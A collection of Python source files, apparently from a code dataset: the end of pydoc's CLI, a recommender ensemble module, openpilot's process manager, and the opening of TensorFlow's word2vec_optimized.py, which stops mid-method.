opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
ensembles_base.py | import warnings
from abc import abstractmethod, ABC
from functools import partial
from itertools import repeat
from multiprocessing import Process, Queue
from multiprocessing.pool import ThreadPool, Pool
from queue import PriorityQueue
from threading import Thread
import numpy as np
import pandas as pd
import scipy.stats
from ml_recsys_tools.recommenders.recommender_base import BaseDFSparseRecommender
from ml_recsys_tools.utils.parallelism import N_CPUS
RANK_COMBINATION_FUNCS = {
'mean': np.mean,
'max': np.max,
'min': np.min,
'gmean': scipy.stats.gmean,
'hmean': scipy.stats.hmean
}
def calc_dfs_and_combine_scores(calc_funcs, groupby_col, item_col, scores_col,
fill_val, combine_func='hmean', n_threads=1,
parallelism='process'):
"""
combine multiple dataframes by voting on prediction rank
:param calc_funcs: functions that return the dataframes to be combined
:param combine_func: defaults 'hmean', the functions that is used to combine the predictions
(can be callable line np.mean or a string that is assumed to be
a key in rank_combination_functions mapping
:param fill_val: rank to be assigned to NaN prediction values
(items appearing in some dataframes but not in others)
:param groupby_col: the column of the entities for which the ranking is calculated (e.g. users)
:param item_col: the column of the entities to be ranked (items)
:param scores_col: the column of the scores to be ranked (predictions)
:param n_threads: number of calculation threads
:param parallelism: type of parallelism (processes or threads)
:return: a combined dataframe of the same format as the dataframes created by the calc_funcs
"""
# set up
multiproc = 'process' in parallelism
_END = 'END'
q_in = Queue()
q_out = Queue() if multiproc else PriorityQueue()
rank_cols = ['rank_' + str(i) for i in range(len(calc_funcs))]
n_jobs = len(calc_funcs)
n_workers = min(n_threads, n_jobs)
if not callable(combine_func):
combine_func = RANK_COMBINATION_FUNCS[combine_func]
jitter = lambda: np.random.rand()
def _calc_df_and_add_rank_score(i):
df = calc_funcs[i]()
df = df.drop_duplicates()
# another pandas bug workaround
df[groupby_col] = df[groupby_col].astype(str, copy=False)
df[item_col] = df[item_col].astype(str, copy=False)
df[scores_col] = df[scores_col].astype(float, copy=False)
df = df.reset_index(drop=True) # resetting index due to pandas bug
df[rank_cols[i]] = df. \
groupby(groupby_col)[scores_col].\
rank(ascending=False)
df = df.drop(scores_col, axis=1).set_index([groupby_col, item_col])
q_out.put((len(df) + jitter(), df))
def _joiner():
while True:
_, df1 = q_out.get()
if isinstance(df1, str) and df1 == _END:
break
_, df2 = q_out.get()
if isinstance(df2, str) and df2 == _END:
q_out.put((len(df1) + jitter(), df1)) # put it back
break
df_joined = df2.join(df1, how='outer')
q_out.put((len(df_joined) + jitter(), df_joined))
def _worker():
i = q_in.get()
while i != _END:
_calc_df_and_add_rank_score(i)
i = q_in.get()
if multiproc:
workers = [Process(target=_worker) for _ in range(n_workers)]
else:
workers = [Thread(target=_worker) for _ in range(n_workers)]
joiner = Thread(target=_joiner)
# submit and start jobs
[q_in.put(i) for i in range(n_jobs)] + [q_in.put(_END) for _ in range(n_workers)]
[j.start() for j in workers + [joiner]]
[j.join() for j in workers]
# stop joiner after workers are done by putting END token
q_out.put((0, _END))
joiner.join()
# final reduce (faster to join in couples rather one by one)
while q_out.qsize() > 1:
_, df1 = q_out.get()
_, df2 = q_out.get()
df_joined = df2.join(df1, how='outer')
q_out.put((len(df_joined), df_joined))
# get final result
_, merged_df = q_out.get()
merged_df.fillna(fill_val, inplace=True)
# combine ranks
merged_df[scores_col] = combine_func(1 / merged_df[rank_cols].values, axis=1)
# drop temp cols
merged_df.drop(rank_cols, axis=1, inplace=True)
return merged_df.reset_index()
class EnsembleBase(BaseDFSparseRecommender):
def __init__(self,
combination_mode='hmean',
na_rank_fill=None,
**kwargs):
self.combination_mode = combination_mode
self.na_rank_fill = na_rank_fill
self.recommenders = []
super().__init__(**kwargs)
def set_exclude_mat(self, exclude_obs=None, exclude_training=True):
super().set_exclude_mat(exclude_obs=exclude_obs, exclude_training=exclude_training)
[rec.set_exclude_mat(exclude_obs=exclude_obs, exclude_training=exclude_training)
for rec in self.recommenders]
def n_concurrent(self):
return N_CPUS
def set_params(self, **params):
params = self._pop_set_params(params, ['combination_mode', 'na_rank_fill'])
# set on self
super().set_params(**params.copy())
def _get_recommendations_flat(self, user_ids, item_ids, n_rec=100, **kwargs):
calc_funcs = [
partial(
rec.get_recommendations,
user_ids=user_ids, item_ids=item_ids,
n_rec=n_rec, results_format='flat', **kwargs)
for rec in self.recommenders]
recos_flat = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=self.na_rank_fill if self.na_rank_fill else (n_rec + 1),
groupby_col=self._user_col,
item_col=self._item_col,
scores_col=self._prediction_col,
n_threads=self.n_concurrent()
)
return recos_flat
def get_similar_items(self, item_ids=None, target_item_ids=None, n_simil=10,
n_unfilt=100, results_format='lists', **kwargs):
calc_funcs = [partial(rec.get_similar_items,
item_ids=item_ids, target_item_ids=target_item_ids,
n_simil=n_unfilt, results_format='flat', **kwargs)
for rec in self.recommenders]
combined_simil_df = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=self.na_rank_fill if self.na_rank_fill else (n_unfilt + 1),
groupby_col=self._item_col_simil,
item_col=self._item_col,
scores_col=self._prediction_col)
return combined_simil_df if results_format == 'flat' \
else self._simil_flat_to_lists(combined_simil_df, n_cutoff=n_simil)
def _predict_on_inds_dense(self, user_inds, item_inds):
raise NotImplementedError()
def predict_for_user(self, user_id, item_ids, rank_training_last=True,
sort=True, combine_original_order=False):
calc_funcs = [
partial(
rec.predict_for_user,
user_id=user_id,
item_ids=item_ids,
rank_training_last=rank_training_last,
combine_original_order=combine_original_order,
)
for rec in self.recommenders]
df = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=len(item_ids),
groupby_col=self._user_col,
item_col=self._item_col,
scores_col=self._prediction_col,
n_threads=N_CPUS,
parallelism='thread'
)
if sort:
df.sort_values(self._prediction_col, ascending=False, inplace=True)
return df
class SubdivisionEnsembleBase(EnsembleBase):
def __init__(self,
n_recommenders=1,
concurrence_ratio=0.3,
concurrency_backend='threads',
**kwargs):
self.n_recommenders = n_recommenders
self.concurrence_ratio = concurrence_ratio
self.concurrency_backend = concurrency_backend
super().__init__(**kwargs)
self.sub_class_type = None
self._init_recommenders()
def get_workers_pool(self, concurrency_backend=None):
if concurrency_backend is None:
concurrency_backend = self.concurrency_backend
if 'thread' in concurrency_backend:
return ThreadPool(self.n_concurrent())
elif 'proc' in concurrency_backend:
return Pool(self.n_concurrent(), maxtasksperchild=3)
def _init_recommenders(self, **params):
self.recommenders = [self.sub_class_type(**params.copy())
for _ in range(self.n_recommenders)]
def n_concurrent(self):
return int(min(np.ceil(len(self.recommenders) * self.concurrence_ratio), N_CPUS))
def set_params(self, **params):
params = self._pop_set_params(
params, ['n_recommenders', 'concurrence_ratio'])
# set on self
super().set_params(**params.copy())
# init sub models to make sure they're the right object already
self._init_recommenders(**self.model_params)
# # set for each sub_model
# for model in self.recommenders:
# # model.set_params(**params.copy())
# model.set_params()
@abstractmethod
def _generate_sub_model_train_data(self, train_obs):
pass
@abstractmethod
def _fit_sub_model(self, args):
pass
def fit(self, train_obs, **fit_params):
self._set_data(train_obs)
sub_model_train_data_generator = self._generate_sub_model_train_data(train_obs)
n_recommenders = self.n_recommenders
with self.get_workers_pool() as pool:
self.recommenders = list(
pool.imap(self._fit_sub_model,
zip(range(n_recommenders),
sub_model_train_data_generator,
repeat(fit_params, n_recommenders))))
return self
# def sub_model_evaluations(self, test_dfs, test_names, include_train=True):
# stats = []
# reports = []
# for m in self.recommenders:
# users = m.train_df[self.train_obs.uid_col].unique()
# items = m.train_df[self.train_obs.iid_col].unique()
# sub_test_dfs = [df[df[self.train_obs.uid_col].isin(users) &
# df[self.train_obs.iid_col].isin(items)] for df in test_dfs]
# lfm_report = m.eval_on_test_by_ranking(
# include_train=include_train,
# test_dfs=sub_test_dfs,
# prefix='lfm sub model',
# test_names=test_names
# )
# stats.append('train: %d, test: %s' %
# (len(m.train_df), [len(df) for df in sub_test_dfs]))
# reports.append(lfm_report)
# return stats, reports
class CombinationEnsembleBase(EnsembleBase):
def __init__(self, recommenders, **kwargs):
super().__init__(**kwargs)
self.recommenders = recommenders
self._reuse_data(self.recommenders[0])
def fit(self, *args, **kwargs):
warnings.warn('Fit is not supported, recommenders should already be fitted.')
|
manager.py | #!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from common.params import Params
from selfdrive.registration import register
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
]
if not PC:
persistent_processes += [
'updated',
'logcatd',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'gpsd',
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
thermal_sock = messaging.sub_sock('thermal')
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
word2vec_optimized.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the _targets word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the _targets word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Global step: scalar, i.e., shape [].
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write("%s %d\n" % (tf.compat.as_text(opts.vocab_words[i]),
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
